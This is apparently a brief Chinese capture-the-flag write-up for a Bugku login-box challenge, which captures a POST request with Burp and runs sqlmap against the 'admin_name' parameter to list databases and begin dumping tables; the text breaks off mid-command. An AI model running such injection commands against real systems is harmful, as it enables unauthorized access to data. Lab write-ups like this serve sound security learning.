bugku-这是一个神奇的登陆框

打开http://123.206.87.240:9001/sql/后是个登陆界面 查看源代码 于是考虑到sql注入,因为是post,所以将burp的抓到的包保存到1.txt中,用sqlmap抓包 命令:sqlmap.py -r 1.txt -p admin_name --dbs//爆数据库名 后续在保表、列以及数据 命令sqlmap.py -r 1.txt -p admin_name -D bug
相关文章
相关标签/搜索